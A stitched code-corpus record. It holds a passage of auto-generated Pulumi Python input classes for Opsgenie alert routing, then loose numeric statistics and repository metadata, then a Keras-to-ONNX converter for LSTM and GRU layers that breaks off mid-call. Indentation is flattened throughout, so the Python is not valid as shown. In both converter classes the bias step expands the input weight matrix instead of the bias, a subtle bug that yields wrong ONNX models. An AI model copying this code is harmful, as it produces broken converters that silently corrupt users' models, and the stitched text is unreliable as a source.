Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
"""
It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
"""
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
"""
User defined value that will be compared with alert field according to the operation. Default: empty string
"""
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates behaviour of the given operation. Default: false
"""
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleIncidentPropertyArgs:
def __init__(__self__, *,
message: pulumi.Input[str],
priority: pulumi.Input[str],
stakeholder_properties: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]],
description: Optional[pulumi.Input[str]] = None,
details: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] message: Message that is to be passed to audience that is generally used to provide a content information about the alert.
:param pulumi.Input[str] priority: Priority level of the alert. Possible values are `P1`, `P2`, `P3`, `P4` and `P5`
:param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]] stakeholder_properties: DEtails about stakeholders for this rule. This is a block, structure is documented below.
:param pulumi.Input[str] description: Description that is generally used to provide a detailed information about the alert.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] details: Map of key-value pairs to use as custom properties of the alert.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Tags of the alert.
"""
pulumi.set(__self__, "message", message)
pulumi.set(__self__, "priority", priority)
pulumi.set(__self__, "stakeholder_properties", stakeholder_properties)
if description is not None:
pulumi.set(__self__, "description", description)
if details is not None:
pulumi.set(__self__, "details", details)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def message(self) -> pulumi.Input[str]:
"""
Message that is to be passed to audience that is generally used to provide a content information about the alert.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: pulumi.Input[str]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def priority(self) -> pulumi.Input[str]:
"""
Priority level of the alert. Possible values are `P1`, `P2`, `P3`, `P4` and `P5`
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: pulumi.Input[str]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="stakeholderProperties")
def stakeholder_properties(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]]:
"""
DEtails about stakeholders for this rule. This is a block, structure is documented below.
"""
return pulumi.get(self, "stakeholder_properties")
@stakeholder_properties.setter
def stakeholder_properties(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs']]]):
pulumi.set(self, "stakeholder_properties", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description that is generally used to provide a detailed information about the alert.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def details(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of key-value pairs to use as custom properties of the alert.
"""
return pulumi.get(self, "details")
@details.setter
def details(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "details", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Tags of the alert.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs:
def __init__(__self__, *,
message: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
enable: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] message: Message that is to be passed to audience that is generally used to provide a content information about the alert.
:param pulumi.Input[str] description: Description that is generally used to provide a detailed information about the alert.
:param pulumi.Input[bool] enable: Option to enable stakeholder notifications.Default value is true.
"""
pulumi.set(__self__, "message", message)
if description is not None:
pulumi.set(__self__, "description", description)
if enable is not None:
pulumi.set(__self__, "enable", enable)
@property
@pulumi.getter
def message(self) -> pulumi.Input[str]:
"""
Message that is to be passed to audience that is generally used to provide a content information about the alert.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: pulumi.Input[str]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description that is generally used to provide a detailed information about the alert.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
Option to enable stakeholder notifications.Default value is true.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@pulumi.input_type
class TeamMemberArgs:
def __init__(__self__, *,
id: pulumi.Input[str],
role: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The UUID for the member to add to this Team.
:param pulumi.Input[str] role: The role for the user within the Team - can be either `admin` or `user`. Default: `user`.
"""
pulumi.set(__self__, "id", id)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
"""
The UUID for the member to add to this Team.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role for the user within the Team - can be either `admin` or `user`. Default: `user`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@pulumi.input_type
class TeamRoutingRuleCriteriaArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: Type of the operation will be applied on conditions. Should be one of `match-all`, `match-any-condition` or `match-all-conditions`.
:param pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]] conditions: List of conditions will be checked before applying team routing rule. This field declaration should be omitted if the criteria type is set to match-all.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the operation will be applied on conditions. Should be one of `match-all`, `match-any-condition` or `match-all-conditions`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]]:
"""
List of conditions will be checked before applying team routing rule. This field declaration should be omitted if the criteria type is set to match-all.
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleCriteriaConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class TeamRoutingRuleCriteriaConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `extra-properties`, `recipients`, `teams` or `priority`.
:param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty` and `equals-ignore-whitespace`.
:param pulumi.Input[str] key: If field is set as extra-properties, key could be used for key-value pair.
:param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default value is false.
:param pulumi.Input[int] order: Order of the condition in conditions list.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
"""
Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `extra-properties`, `recipients`, `teams` or `priority`.
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
"""
It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty` and `equals-ignore-whitespace`.
"""
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
If field is set as extra-properties, key could be used for key-value pair.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates behaviour of the given operation. Default value is false.
"""
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Order of the condition in conditions list.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class TeamRoutingRuleNotifyArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The ID of the Opsgenie Team Routing Rule.
:param pulumi.Input[str] name: Name of the team routing rule
"""
pulumi.set(__self__, "type", type)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Opsgenie Team Routing Rule.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the team routing rule
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class TeamRoutingRuleTimeRestrictionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]] = None):
pulumi.set(__self__, "type", type)
if restrictions is not None:
pulumi.set(__self__, "restrictions", restrictions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]]:
return pulumi.get(self, "restrictions")
@restrictions.setter
def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TeamRoutingRuleTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restrictions", value)
@pulumi.input_type
class TeamRoutingRuleTimeRestrictionRestrictionArgs:
def __init__(__self__, *,
end_day: pulumi.Input[str],
end_hour: pulumi.Input[int],
end_min: pulumi.Input[int],
start_day: pulumi.Input[str],
start_hour: pulumi.Input[int],
start_min: pulumi.Input[int]):
pulumi.set(__self__, "end_day", end_day)
pulumi.set(__self__, "end_hour", end_hour)
pulumi.set(__self__, "end_min", end_min)
pulumi.set(__self__, "start_day", start_day)
pulumi.set(__self__, "start_hour", start_hour)
pulumi.set(__self__, "start_min", start_min)
@property
@pulumi.getter(name="endDay")
def end_day(self) -> pulumi.Input[str]:
return pulumi.get(self, "end_day")
@end_day.setter
def end_day(self, value: pulumi.Input[str]):
pulumi.set(self, "end_day", value)
@property
@pulumi.getter(name="endHour")
def end_hour(self) -> pulumi.Input[int]:
return pulumi.get(self, "end_hour")
@end_hour.setter
def end_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "end_hour", value)
@property
@pulumi.getter(name="endMin")
def end_min(self) -> pulumi.Input[int]:
return pulumi.get(self, "end_min")
@end_min.setter
def end_min(self, value: pulumi.Input[int]):
pulumi.set(self, "end_min", value)
@property
@pulumi.getter(name="startDay")
def start_day(self) -> pulumi.Input[str]:
return pulumi.get(self, "start_day")
@start_day.setter
def start_day(self, value: pulumi.Input[str]):
pulumi.set(self, "start_day", value)
@property
@pulumi.getter(name="startHour")
def start_hour(self) -> pulumi.Input[int]:
return pulumi.get(self, "start_hour")
@start_hour.setter
def start_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "start_hour", value)
@property
@pulumi.getter(name="startMin")
def start_min(self) -> pulumi.Input[int]:
return pulumi.get(self, "start_min")
@start_min.setter
def start_min(self, value: pulumi.Input[int]):
pulumi.set(self, "start_min", value)
@pulumi.input_type
class UserUserAddressArgs:
def __init__(__self__, *,
city: pulumi.Input[str],
country: pulumi.Input[str],
line: pulumi.Input[str],
state: pulumi.Input[str],
zipcode: pulumi.Input[str]):
pulumi.set(__self__, "city", city)
pulumi.set(__self__, "country", country)
pulumi.set(__self__, "line", line)
pulumi.set(__self__, "state", state)
pulumi.set(__self__, "zipcode", zipcode)
@property
@pulumi.getter
def city(self) -> pulumi.Input[str]:
return pulumi.get(self, "city")
@city.setter
def city(self, value: pulumi.Input[str]):
pulumi.set(self, "city", value)
@property
@pulumi.getter
def country(self) -> pulumi.Input[str]:
return pulumi.get(self, "country")
@country.setter
def country(self, value: pulumi.Input[str]):
pulumi.set(self, "country", value)
@property
@pulumi.getter
def line(self) -> pulumi.Input[str]:
return pulumi.get(self, "line")
@line.setter
def line(self, value: pulumi.Input[str]):
pulumi.set(self, "line", value)
@property
@pulumi.getter
def state(self) -> pulumi.Input[str]:
return pulumi.get(self, "state")
@state.setter
def state(self, value: pulumi.Input[str]):
pulumi.set(self, "state", value)
@property
@pulumi.getter
def zipcode(self) -> pulumi.Input[str]:
return pulumi.get(self, "zipcode")
@zipcode.setter
def zipcode(self, value: pulumi.Input[str]):
pulumi.set(self, "zipcode", value)
@pulumi.input_type
class GetEscalationRepeatArgs:
def __init__(__self__, *,
close_alert_after_all: Optional[bool] = None,
count: Optional[int] = None,
reset_recipient_states: Optional[bool] = None,
wait_interval: Optional[int] = None):
if close_alert_after_all is not None:
pulumi.set(__self__, "close_alert_after_all", close_alert_after_all)
if count is not None:
pulumi.set(__self__, "count", count)
if reset_recipient_states is not None:
pulumi.set(__self__, "reset_recipient_states", reset_recipient_states)
if wait_interval is not None:
pulumi.set(__self__, "wait_interval", wait_interval)
@property
@pulumi.getter(name="closeAlertAfterAll")
def close_alert_after_all(self) -> Optional[bool]:
return pulumi.get(self, "close_alert_after_all")
@close_alert_after_all.setter
def close_alert_after_all(self, value: Optional[bool]):
pulumi.set(self, "close_alert_after_all", value)
@property
@pulumi.getter
def count(self) -> Optional[int]:
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[int]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="resetRecipientStates")
def reset_recipient_states(self) -> Optional[bool]:
return pulumi.get(self, "reset_recipient_states")
@reset_recipient_states.setter
def reset_recipient_states(self, value: Optional[bool]):
pulumi.set(self, "reset_recipient_states", value)
@property
@pulumi.getter(name="waitInterval")
def wait_interval(self) -> Optional[int]:
return pulumi.get(self, "wait_interval")
@wait_interval.setter
def wait_interval(self, value: Optional[int]):
pulumi.set(self, "wait_interval", value)
@pulumi.input_type
class GetEscalationRuleArgs:
def __init__(__self__, *,
condition: str,
delay: int,
notify_type: str,
recipients: Sequence['GetEscalationRuleRecipientArgs']):
pulumi.set(__self__, "condition", condition)
pulumi.set(__self__, "delay", delay)
pulumi.set(__self__, "notify_type", notify_type)
pulumi.set(__self__, "recipients", recipients)
@property
@pulumi.getter
def condition(self) -> str:
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: str):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def delay(self) -> int:
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: int):
pulumi.set(self, "delay", value)
@property
@pulumi.getter(name="notifyType")
def notify_type(self) -> str:
return pulumi.get(self, "notify_type")
@notify_type.setter
def notify_type(self, value: str):
pulumi.set(self, "notify_type", value)
@property
@pulumi.getter
def recipients(self) -> Sequence['GetEscalationRuleRecipientArgs']:
return pulumi.get(self, "recipients")
@recipients.setter
def recipients(self, value: Sequence['GetEscalationRuleRecipientArgs']):
pulumi.set(self, "recipients", value)
@pulumi.input_type
class GetEscalationRuleRecipientArgs:
def __init__(__self__, *,
id: Optional[str] = None,
type: Optional[str] = None):
"""
:param str id: The ID of the Opsgenie Escalation.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the Opsgenie Escalation.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class GetTeamMemberArgs:
def __init__(__self__, *,
id: Optional[str] = None,
role: Optional[str] = None):
"""
:param str id: The ID of the Opsgenie Team.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the Opsgenie Team.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def role(self) -> Optional[str]:
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[str]):
pulumi.set(self, "role", value)
| 38.695198
| 305
| 0.63875
| 19,195
| 166,815
| 5.410524
| 0.025007
| 0.119474
| 0.074546
| 0.047383
| 0.921015
| 0.89573
| 0.86147
| 0.816533
| 0.796062
| 0.765731
| 0
| 0.001278
| 0.235273
| 166,815
| 4,310
| 306
| 38.704176
| 0.812837
| 0.258184
| 0
| 0.786802
| 1
| 0
| 0.112434
| 0.060282
| 0
| 0
| 0
| 0
| 0
| 1
| 0.212473
| false
| 0
| 0.001813
| 0.026831
| 0.33285
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bad500201b4a00a944f37f705e91e2f13dd0f0a6
| 10,921
|
py
|
Python
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 33
|
2020-06-09T21:05:35.000Z
|
2022-02-24T01:48:45.000Z
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 17
|
2020-07-14T19:44:09.000Z
|
2022-02-10T10:03:01.000Z
|
keras-onnx/onnx_keras/recurrent_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 16
|
2020-06-17T22:56:11.000Z
|
2021-12-21T05:44:32.000Z
|
"""Converters for recurrent layers in Keras
"""
import onnx as O
import numpy as np
from .base_layer import Layer
from .core_layers import Activation
from .exceptions import FeatureNotImplemented, OnnxNotSupport
from . import helper
activation_mapping = {
'elu': "Elu",
'softplus': 'Softplus',
'softsign': 'Softsign',
'relu': 'Relu',
'tanh': 'Tanh',
'sigmoid': 'Sigmoid',
'hard_sigmoid': 'HardSigmoid',
'linear': None
}
class LSTM(Layer):
"""LSTM layer converter. This LSTM is not bidirectional.
A LSTM layer will be converted into four layers:
Transpose => LSTM => Transpose => Reshape
"""
def __init__(self, node):
Layer.__init__(self, node)
def generate(self):
# Convert LSTM
node_list = []
value_list = []
# Keras activation layer
keras_activation = self.layer.cell.activation.__name__
if keras_activation not in activation_mapping:
raise OnnxNotSupport("Activation in LSTM: " + keras_activation)
keras_activation = activation_mapping[keras_activation]
keras_recurrent_activation = self.layer.cell.recurrent_activation.__name__
if keras_recurrent_activation not in activation_mapping:
raise OnnxNotSupport("Activation in LSTM: " + keras_recurrent_activation)
keras_recurrent_activation = activation_mapping[keras_recurrent_activation]
activations = [keras_recurrent_activation, keras_activation, keras_activation]
# Give activation alpha and beta
activation_alpha = []
activation_beta = []
for activation in activations:
if activation == 'Elu':
activation_alpha.append(1.0)
activation_beta.append(0.0)
elif activation == 'HardSigmoid':
activation_alpha.append(0.2)
activation_beta.append(0.5)
else:
activation_alpha.append(0.0)
activation_beta.append(0.0)
# Direction
if self.layer.go_backwards:
direction = 'reverse'
else:
direction = 'forward'
# Construct First Transpose
input_list = []
dims = [1, 0, 2]
preprocess_name = self.name + "_preprocess"
preprocess_node = O.helper.make_node(
'Transpose',
inputs=self.inputs,
outputs=[preprocess_name],
name=preprocess_name,
perm=dims
)
preprocess_size = [self.node.inputs[0].keras_shape[1],
self.node.inputs[0].keras_shape[0], self.node.inputs[0].keras_shape[2]]
preprocess_info = O.helper.make_tensor_value_info(
preprocess_name,
helper.dtype,
preprocess_size
)
node_list.append(preprocess_node)
value_list.append(preprocess_info)
input_list.append(preprocess_name)
# Construct Weights
w = self.layer.cell.get_weights()[0]
w = np.transpose(w, [1, 0])
w = np.expand_dims(w, 0)
if helper.duplicate_weights:
w_name = self.name + "_weight"
else:
w_name = self.layer.weights[0].name
tn, ti = helper.getConstantNodeByName(w_name, w)
node_list += tn
value_list += ti
input_list.append(w_name)
# Construct recurrent weight
rw = self.layer.cell.get_weights()[1]
rw = np.transpose(rw, [1, 0])
rw = np.expand_dims(rw, 0)
if helper.duplicate_weights:
rw_name = self.name + "_recurrent_weight"
else:
rw_name = self.layer.weights[1].name
tn, ti = helper.getConstantNodeByName(rw_name, rw)
node_list += tn
value_list += ti
input_list.append(rw_name)
# Construct bias if needed
if self.layer.cell.use_bias:
b = self.layer.cell.get_weights()[2]
b = np.expand_dims(w, 0)
if helper.duplicate_weights:
bnode_name = self.name + "_bias"
else:
bnode_name = self.layer.weights[2].name
tn, ti = helper.getConstantNodeByName(bnode_name, b)
node_list += tn
value_list += ti
input_list.append(bnode_name)
# Generate Node
output_name = self.name + "_intermediate"
node = O.helper.make_node(
'LSTM',
inputs = input_list,
outputs = [output_name],
name = self.name,
activation_alpha = activation_alpha,
activation_beta = activation_beta,
activations = activations,
direction = direction,
hidden_size = self.layer.cell.units
)
output_size = [self.node.outputs[0].keras_shape[1],
self.node.outputs[0].keras_shape[0], 1, self.node.outputs[0].keras_shape[2]]
output_info = O.helper.make_tensor_value_info(
output_name,
helper.dtype,
output_size
)
node_list.append(node)
value_list.append(output_info)
# Construct second Transpose layer
dims = [1, 2, 0, 3]
postprocess_name = self.name + "_postprocess"
postprocess_node = O.helper.make_node(
'Transpose',
inputs=[output_name],
outputs=[postprocess_name],
name=postprocess_name,
perm=dims
)
postprocess_size = [1, self.node.outputs[0].shape[0],
self.node.outputs[0].shape[1], self.node.outputs[0].shape[2]]
postprocess_info = O.helper.make_tensor_value_info(
postprocess_name,
helper.dtype,
postprocess_size
)
node_list.append(postprocess_node)
value_list.append(postprocess_info)
# Construct Reshape
shape_name = self.name + '_shape'
output_shape = self.output_shape
tn, ti = helper.constructConstantNode(
shape_name,
np.array(output_shape, dtype='int64'))
node_list += tn
value_list += ti
node = O.helper.make_node(
op_type='Reshape',
inputs=[postprocess_name, shape_name],
outputs=self.outputs,
name=self.name + "_reshape"
)
node_list.append(node)
return node_list, value_list
class GRU(Layer):
"""GRU layer converter. This GRU is not bidirectional.
A GRU layer will be converted into four layers:
Transpose => GRU => Transpose => Reshape
"""
def __init__(self, node):
Layer.__init__(self, node)
def generate(self):
# Convert GRU
node_list = []
value_list = []
# Keras activation layer
keras_activation = self.layer.cell.activation.__name__
if keras_activation not in activation_mapping:
raise OnnxNotSupport("Activation in GRU: " + keras_activation)
keras_activation = activation_mapping[keras_activation]
keras_recurrent_activation = self.layer.cell.recurrent_activation.__name__
if keras_recurrent_activation not in activation_mapping:
raise OnnxNotSupport("Activation in GRU: " + keras_recurrent_activation)
keras_recurrent_activation = activation_mapping[keras_recurrent_activation]
activations = [keras_recurrent_activation, keras_activation, keras_activation]
# Give activation alpha and beta
activation_alpha = []
activation_beta = []
for activation in activations:
if activation == 'Elu':
activation_alpha.append(1.0)
activation_beta.append(0.0)
elif activation == 'HardSigmoid':
activation_alpha.append(0.2)
activation_beta.append(0.5)
else:
activation_alpha.append(0.0)
activation_beta.append(0.0)
# Direction
if self.layer.go_backwards:
direction = 'reverse'
else:
direction = 'forward'
# Construct First Transpose
input_list = []
dims = [1, 0, 2]
preprocess_name = self.name + "_preprocess"
preprocess_node = O.helper.make_node(
'Transpose',
inputs=self.inputs,
outputs=[preprocess_name],
name=preprocess_name,
perm=dims
)
preprocess_size = [self.node.inputs[0].keras_shape[1],
self.node.inputs[0].keras_shape[0], self.node.inputs[0].keras_shape[2]]
preprocess_info = O.helper.make_tensor_value_info(
preprocess_name,
helper.dtype,
preprocess_size
)
node_list.append(preprocess_node)
value_list.append(preprocess_info)
input_list.append(preprocess_name)
# Construct Weights
w = self.layer.cell.get_weights()[0]
w = np.transpose(w, [1, 0])
w = np.expand_dims(w, 0)
if helper.duplicate_weights:
w_name = self.name + "_weight"
else:
w_name = self.layer.weights[0].name
tn, ti = helper.getConstantNodeByName(w_name, w)
node_list += tn
value_list += ti
input_list.append(w_name)
# Construct recurrent weight
rw = self.layer.cell.get_weights()[1]
rw = np.transpose(rw, [1, 0])
rw = np.expand_dims(rw, 0)
if helper.duplicate_weights:
rw_name = self.name + "_recurrent_weight"
else:
rw_name = self.layer.weights[1].name
tn, ti = helper.getConstantNodeByName(rw_name, rw)
node_list += tn
value_list += ti
input_list.append(rw_name)
# Construct bias if needed
if self.layer.cell.use_bias:
b = self.layer.cell.get_weights()[2]
b = np.expand_dims(w, 0)
if helper.duplicate_weights:
bnode_name = self.name + "_bias"
else:
bnode_name = self.layer.weights[2].name
tn, ti = helper.getConstantNodeByName(bnode_name, b)
node_list += tn
value_list += ti
input_list.append(bnode_name)
# Generate Node
output_name = self.name + "_intermediate"
node = O.helper.make_node(
'GRU',
inputs = input_list,
outputs = [output_name],
name = self.name,
activation_alpha = activation_alpha,
activation_beta = activation_beta,
activations = activations,
direction = direction,
hidden_size = self.layer.cell.units
)
output_size = [self.node.outputs[0].keras_shape[1],
self.node.outputs[0].keras_shape[0], 1, self.node.outputs[0].keras_shape[2]]
output_info = O.helper.make_tensor_value_info(
output_name,
helper.dtype,
output_size
)
node_list.append(node)
value_list.append(output_info)
# Construct second Transpose layer
dims = [1, 2, 0, 3]
postprocess_name = self.name + "_postprocess"
postprocess_node = O.helper.make_node(
'Transpose',
inputs=[output_name],
outputs=[postprocess_name],
name=postprocess_name,
perm=dims
)
postprocess_size = [1, self.node.outputs[0].shape[0],
self.node.outputs[0].shape[1], self.node.outputs[0].shape[2]]
postprocess_info = O.helper.make_tensor_value_info(
postprocess_name,
helper.dtype,
postprocess_size
)
node_list.append(postprocess_node)
value_list.append(postprocess_info)
# Construct Reshape
shape_name = self.name + '_shape'
output_shape = self.output_shape
tn, ti = helper.constructConstantNode(
shape_name,
np.array(output_shape, dtype='int64'))
node_list += tn
value_list += ti
node = O.helper.make_node(
op_type='Reshape',
